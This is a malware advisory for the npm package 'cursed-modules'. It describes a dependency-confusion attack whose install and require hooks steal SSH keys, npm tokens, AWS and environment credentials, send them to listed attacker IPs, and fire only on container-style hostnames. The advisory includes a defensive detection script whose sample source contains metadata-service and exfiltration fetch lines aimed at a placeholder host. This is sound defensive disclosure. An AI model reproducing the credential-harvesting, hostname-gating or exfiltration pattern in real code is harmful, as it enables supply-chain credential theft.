MAL-2026-6698
Malicious code in cursed-modules (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0a7db807a976b54ad8fe1246159e9ac2e5830671792d2ae8e388bf30435d36c3)

Package version 999.0.3 (an implausibly high version number, consistent with a dependency-confusion attack against an internal package name) ships install-time and require-time credential theft directed at hardcoded attacker endpoints.

Install-time payload: package.json declares all three lifecycle hooks (preinstall, install, postinstall) as `node install.js`. install.js reads /root/.ssh/id_rsa, id_ed25519, authorized_keys, known_hosts and the ssh config, /root/.npmrc, /app/.git/config plus the git history, and the full process.env, base64-encodes the bundle and PUTs it to http://154.57.164.82:30843/api/modules/ECT-839201.

Require-time payload: index.js (the package main) runs a top-level IIFE on require() that dumps process.env, runs `aws sts get-caller-identity`, queries the AWS instance metadata service at http://169.254.169.254/latest/meta-data/iam/security-credentials/, and runs `aws secretsmanager list-secrets`, PUTing the results to the same attacker IP at /api/modules/ECT-654321.

Registry reconnaissance: recon.js targets private npm registry infrastructure. It reads /verdaccio/conf/config.yaml, locates and reads Verdaccio htpasswd files, /root/.npmrc and /home/user/.npmrc, cron jobs, the process list, netstat output, /proc/1/environ and the full environment, and PUTs the result to http://154.57.164.76:30728/api/modules/ECT-654321 (falling back to curl from a shell if needed).

Execution gate: both install.js and index.js run their payload only when `/^[0-9a-f]{12}$/.test(os.hostname())` is true, i.e. when the hostname is a 12-hex-digit Docker container ID. The payload therefore fires inside containerized CI/CD environments and stays dormant on developer laptops and on analysis sandboxes whose hostname does not match; dynamic analysis should set such a hostname before installing or requiring the package.

Purpose: publish-and-arm.sh labels the package manifest with `ship_deck: "dependency-confusion"` and `cargo_hold: "verdaccio-proxy"`, confirming that the package is intended to shadow an internal name on the public registry and harvest the victim's private registry credentials for follow-on attacks.
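As an added example (not from the advisory, Amazon Inspector or the package itself), the following Node.js script turns the indicators described above into checks a reviewer can run over a package manifest and a source file: all three lifecycle hooks pointing at one script, an implausible major version, the 12-hex container-ID hostname gate, PUT-style endpoints addressed by raw IP, and the IMDS URL. The manifest, source snippet, package name and the 192.0.2.10 endpoint are constructed for the example (192.0.2.0/24 is a documentation range, not the real C2), and the major-version threshold of 100 is an assumed heuristic, not a rule from the advisory.

```javascript
// Added example: heuristic checks for the manifest and source indicators
// described in the advisory. Sample inputs below are constructed, not the
// real package files.

// The gate the malware uses: a hostname of exactly 12 lowercase hex digits,
// which is what Docker assigns to a container by default.
const CONTAINER_HOSTNAME = /^[0-9a-f]{12}$/;

function looksLikeContainerHostname(hostname) {
  return CONTAINER_HOSTNAME.test(hostname);
}

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];

// Flags a parsed package.json for lifecycle hooks and for a major version far
// above anything a real release line reaches (maxSaneMajor is an assumption).
function auditManifest(pkg, { maxSaneMajor = 100 } = {}) {
  const findings = [];
  const scripts = pkg.scripts || {};
  const hooks = LIFECYCLE_HOOKS.filter((h) => h in scripts);
  if (hooks.length > 0) {
    const cmds = new Set(hooks.map((h) => scripts[h]));
    if (hooks.length === LIFECYCLE_HOOKS.length && cmds.size === 1) {
      findings.push(`all three lifecycle hooks run the same command: ${[...cmds][0]}`);
    } else {
      findings.push(`lifecycle hooks present: ${hooks.join(", ")}`);
    }
  }
  const major = Number.parseInt(String(pkg.version || "0").split(".")[0], 10);
  if (Number.isFinite(major) && major > maxSaneMajor) {
    findings.push(`implausibly high major version ${pkg.version} (dependency-confusion pattern)`);
  }
  return findings;
}

// Flags a JavaScript source string for the hostname gate, raw-IP endpoints
// and the cloud instance metadata address.
function auditSource(src) {
  const findings = [];
  if (/\^\[0-9a-f\]\{12\}\$/.test(src) && /hostname\(\)/.test(src)) {
    findings.push("gates execution on a 12-hex container-ID hostname");
  }
  const urls = src.match(/https?:\/\/[^\s'"`)]+/g) || [];
  for (const u of urls) {
    if (/^https?:\/\/\d{1,3}(\.\d{1,3}){3}(:\d+)?/.test(u)) {
      findings.push(`contacts raw IP endpoint ${u}`);
    }
  }
  if (/169\.254\.169\.254/.test(src)) {
    findings.push("queries the cloud instance metadata service");
  }
  return findings;
}

// Constructed sample manifest modelled on the advisory's description.
const SAMPLE_MANIFEST = {
  name: "example-internal-pkg", // hypothetical name
  version: "999.0.3",
  main: "index.js",
  scripts: {
    preinstall: "node install.js",
    install: "node install.js",
    postinstall: "node install.js",
  },
};

// Constructed sample source; 192.0.2.10 is a documentation address.
const SAMPLE_SOURCE = [
  "const os = require('os');",
  "if (/^[0-9a-f]{12}$/.test(os.hostname())) {",
  "  fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/');",
  "  fetch('http://192.0.2.10:30843/api/modules/EXAMPLE', { method: 'PUT' });",
  "}",
].join("\n");

console.log(auditManifest(SAMPLE_MANIFEST));
console.log(auditSource(SAMPLE_SOURCE));
console.log("gate passes for 3f2c9a1b7e4d:", looksLikeContainerHostname("3f2c9a1b7e4d"));
```

The hostname check is also the analyst's lever: a sandbox whose hostname matches `/^[0-9a-f]{12}$/` will trigger the payload, while one named after a user or a VM template will observe nothing and may wrongly clear the package.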
## Source: ossf-package-analysis (0dade1c70e7e7f58c8f791931e5fe7cf7c40b68358173ed097b7dca6a4f4041d) The OpenSSF Package Analysis project identified 'cursed-modules' @ 999.0.0 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
Affected packages
No fixed version published yet for cursed-modules (npm). Pin to a known-safe version or switch to an alternative. On any host or CI runner that installed or required an affected version, treat the material the payload collects as compromised and rotate it: SSH keys, .npmrc registry tokens, AWS credentials (including the instance role's temporary credentials and any secrets reachable through Secrets Manager), git credentials and everything exposed in the environment.
References
- https://www.npmjs.com/package/cursed-modules/v/999.0.0 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.3 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.1 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.2 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/2.0.0 [PACKAGE]